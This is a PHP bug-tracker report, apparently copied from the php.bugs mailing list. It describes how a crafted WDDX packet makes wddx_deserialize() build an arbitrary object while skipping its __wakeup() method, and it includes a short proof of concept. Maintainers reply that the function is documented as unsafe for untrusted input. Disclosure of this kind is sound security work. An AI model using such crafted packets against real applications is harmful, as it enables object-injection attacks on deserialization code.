Bug #75007 [Opn]: Create an Unexpected Object in During WDDX Deserialization

From: Date: Sat, 05 Dec 2020 16:20:29 +0000
Subject: Bug #75007 [Opn]: Create an Unexpected Object in During WDDX Deserialization
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-230874@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=75007&edit=1 ID: 75007 Updated by: cmb@php.net Reported by: taoguangchen at icloud dot com Summary: Create an Unexpected Object in During WDDX Deserialization Status: Open Type: Bug Package: WDDX related Operating System: * PHP Version: 5.6.31 Block user comment: N Private report: N New Comment: Actually, this is not even a bug; the behavior is documented and it is warned against passing untrusted input to that function. Also, the complete WDDX extension is deprecated and unbundled as of PHP 7.4.0. Previous Comments: ------------------------------------------------------------------------ [2017-07-31 12:46:39] zeev@php.net Like unserialize, wddx_deserialize() must not be fed with untrusted input. Consequently we don't consider bugs in wddx_deserialize security vulnerabilities. Removing Private flag... ------------------------------------------------------------------------ [2017-07-30 14:34:10] taoguangchen at icloud dot com Description: ------------ Create an Unexpected Object in During WDDX Deserialization In During WDDX Deserialization, an unexpected object can be created via the crafted wddx pockets, and bypass __wakeup() method PoC: ``` class obj { function __wakeup() { var_dump('hi'); } } $wddx = <<<EOT <?xml version='1.0'?> <wddxPacket version='1.0'> <header/> <data> <struct> <var name='php_class_name'> <string>obj</string> </var> <var name='prop'> <string>ryat</string> </var> EOT; var_dump(wddx_deserialize($wddx)); ``` ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=75007&edit=1

« previous php.bugs (#230874) next »